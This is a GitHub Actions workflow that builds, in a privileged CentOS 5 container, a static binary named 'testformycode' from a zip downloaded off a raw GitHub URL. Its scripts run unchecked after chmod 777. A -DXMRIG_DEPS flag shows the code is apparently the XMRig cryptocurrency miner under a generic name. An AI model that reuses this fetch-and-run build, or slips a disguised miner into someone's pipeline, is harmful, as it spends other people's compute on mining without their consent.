name: Build and Install Dependencies centos5

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Set up CentOS 5 in Docker
        uses: docker://centos:5
        with:
          options: --privileged  # 确保有足够权限

      - name: Install Dependencies in CentOS 5
        run: |
          # 更新 yum 并安装 EPEL 源
          yum install -y epel-release
          yum install -y curl unzip git gcc gcc-c++ make cmake automake libtool autoconf libatomic
          
          # CentOS 5 默认没有 CMake，需要手动编译或安装旧版本
          curl -L -o cmake-2.8.12.tar.gz https://cmake.org/files/v2.8/cmake-2.8.12.tar.gz
          tar -xzf cmake-2.8.12.tar.gz
          cd cmake-2.8.12
          ./bootstrap && make && make install
          cd ..

      - name: Download and Unzip Source Code
        run: |
          curl -L -o testformycode.zip https://raw.githubusercontent.com/tjbcc0/tetmc/refs/heads/main/testformycode.zip
          unzip testformycode.zip

      - name: Build Project
        run: |
          cd testformycode/scripts
          chmod 777 *.sh
          ./build_deps.sh
          cd ..
          mkdir build
          cd build
          /usr/local/bin/cmake -DXMRIG_DEPS=scripts/deps -DBUILD_SHARED_LIBS=OFF ..
          make

      - name: Check Binary Dependencies
        run: |
          cd testformycode/build
          ldd testformycode

      - name: Upload Build Artifacts
        uses: actions/upload-artifact@v3
        with:
          name: build-output
          path: testformycode/build/testformycode  # 修改为具体的可执行文件路径
